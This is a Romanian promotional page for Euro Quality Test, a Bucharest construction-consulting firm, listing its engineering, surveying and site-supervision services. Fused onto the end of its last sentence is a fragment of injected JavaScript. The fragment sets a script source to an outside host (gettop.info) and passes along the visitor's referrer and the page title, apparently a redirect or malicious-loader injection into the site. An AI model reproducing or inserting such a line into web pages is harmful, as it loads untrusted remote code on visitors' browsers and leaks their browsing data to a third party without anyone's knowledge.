consultanta tehnica constructii

consultanta tehnica constructiiIn practica realizarii investitiilor in tarile din Uniunea Europeana, investitorii solicita sprijinul unor specialisti in servicii de consultanta, in scopul realizarii acestora la nivelul cerintelor calitative, cu un cost minim si nu in ultimul rand, o durata optima de executie.

Pentru lucrari in conditii deplinde de siguranta conform celor mai inalte standarde, Euro Quality Test iti sta la dispozitie cu servicii de consultanta tehnica constructii, pentru orice tip de proiect, indiferent de complexitate.

Printre serviciile pe care Euro Quality Test le ofera clientilor se numara: expertizare tehnica, consultanta si inginerie, proiectare si dirigentie santier, studii geotehnice, hidrogeologie si impact de mediu, foraje de apa, foraje de observatie, constructii civile si industriale, cadastru intabulare, GPS, consultanta, monitorizare topografica, planuri topografice, PUZ, PUD, CU, PAC, productie de betoane si prefabricate din beton si beton armat, inclusiv consultanta tehnica constructii.

Apeleaza la profesionistii in consultanta tehnica constructii si asigura-te ca proiectul tau va fi finalizat cu succes.

Consultanta tehnica constructii- Mai sigur, mai rapid si mai ieftin!

Prin activitatea de consultanta se intelege efectuarea unor servicii necesare pentru realizarea investitiilor incepand de la faza de proiect, pana la faza punerii in functiune. Serviciile de consultanta pot fi folosite atat de catre investitorii cu surse de finantare publice sau asimilate acestora, cat si de cei cu surse de finantare private.

Aceste servicii se asigura prin specialisti in domeniu, cu pregatire vasta si gata sa raspunda cu succes tuturor exigentelor venite din partea clientilor. Serviciile de consultanta se bucura de o popularitate mare datorita numeroaselor avantaje pe care le ofera beneficiarilor.

De ce este recomandat sa apelezi la servicii de consultanta? In primul rand, se obtine reducerea termenului de realizare a investitiei, dar si reducerea costurilor prin realizarea unui manageament performant al investitiei. In al doilea rand, prin servicii de consultanta ai certitudinea folosirii de tehnologii adecvate, moderne care duc la diminuarea de costuri. Nu in ultimul rand, prin servicii de consultanta ai posibilitatea de a obtine evaluari si recomandari independente si obiective.

Iata ce presupune consultanta tehnica constructii

Serviciile de consultanta tehnica constructii se utilizeaza de catre investitorii care au nevoie de sprijin tehnic in scopul realizarii unor investitii de calitate si presupun:

A. Etapa de promovare a investitiei

B. Etapa de pregatire a investitiei

C. Etapa de executie a investitiei:

– supravegherea executiei lucrarilor de constructie prin diriginti de santier atasati in conformitate cu prevederile legale in vigoare

– asistenta tehnica pentru proiecte acordata antreprenorilor

– proiecte tehnologice si de organizare pe santier

– analiza si compararea ofertelor pentru echipamente

– intocmirea cartii tehnice a constructiei

– urmarirea comportarii in timp a constructiei prin personal tehnic atasat in conformitate cu prevederile legale in vigoare

Euro Quality Test- Specialist in consultanta tehnica constructii

Daca vrei sa ai siguranta efectuarii tuturor acestor etape pana in cele mai mici detalii si prin intermediul unor profesionisti in domeniu, apeleaza la Euro Quality Test, companie din Bucuresti ce are ca principal domeniu de activitate oferirea de servicii de inginerie si consultanta tehnica legata de acestea.

Iti punem la dispozitie servicii de consultanta tehnica constructii pentru buna executie a lucrarilor pe santier cu ajutorul unor inspectori autorizati. Specialistii Euro Quality Test iti vor explica si te vor sfatui in privinta pasilor care trebuie respectati astfel incat sa poti obtine rezultatele dorite.

Pentru mai mult informatii cu privire la serviciile de consultanta tehnica constructii oferite de Euro Quality Test, acceseaza pagina noastra de internet si contacteaza-ne.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;